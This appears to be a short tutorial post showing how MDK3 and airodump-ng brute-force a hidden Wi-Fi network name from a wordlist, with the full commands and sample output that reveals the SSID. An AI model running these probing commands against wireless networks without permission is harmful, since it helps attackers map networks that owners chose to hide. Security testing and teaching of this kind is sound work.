MDK3's one of the best feature is to bruteforcing hideen ESSID' works in 2 way one we can try with every possible combination,suitable for short ESSID's or we can try using default/custom created ESSID list.I have attached shmoo group's WPA Tables ESSID with modification of some more default ESSID which I got from different now there is approx 1143 ESSID's.using MDK3 within few seconds you can get the Hidden ESSID's.
I have set the 11 chars. Essid and set it to hidden.
Tested using Linksys WUSB54GC adapter and Linksys WRT54G Router.


bt~#airodump-ng rausb0

open one more window

#if command supplied without target -t will bruteforce for all #hidden ESSID's in range.

bt ~ # mdk3 rausb0 p -f SSID.txt -t 00:21:29:68:16:C2

SSID Wordlist Mode activated!

Waiting for beacon frame from target...
Sniffer thread started

SSID is hidden. SSID Length is: 11.
Trying SSID: linksys
Trying SSID: ascend
Trying SSID: <any ssid>
Trying SSID: mynetwork
Trying SSID: fatport
Trying SSID: 2WIRE975
Trying SSID: 2WIRE186
Trying SSID: 2WIRE707
Trying SSID: 2WIRE774
Trying SSID: 2WIRE436
Packets sent: 1143 - Speed: 120 packets/sec
Got response from 00:21:29:68:16:C2, SSID: "thunderbolt"

Here you got hidden ESSID in less then 10 default its speed is 300 pps.In airodump-ng window you can see that hidden essid <length: 11> has been now changed to your essid.e.g. thunderbolt.

Download Essid File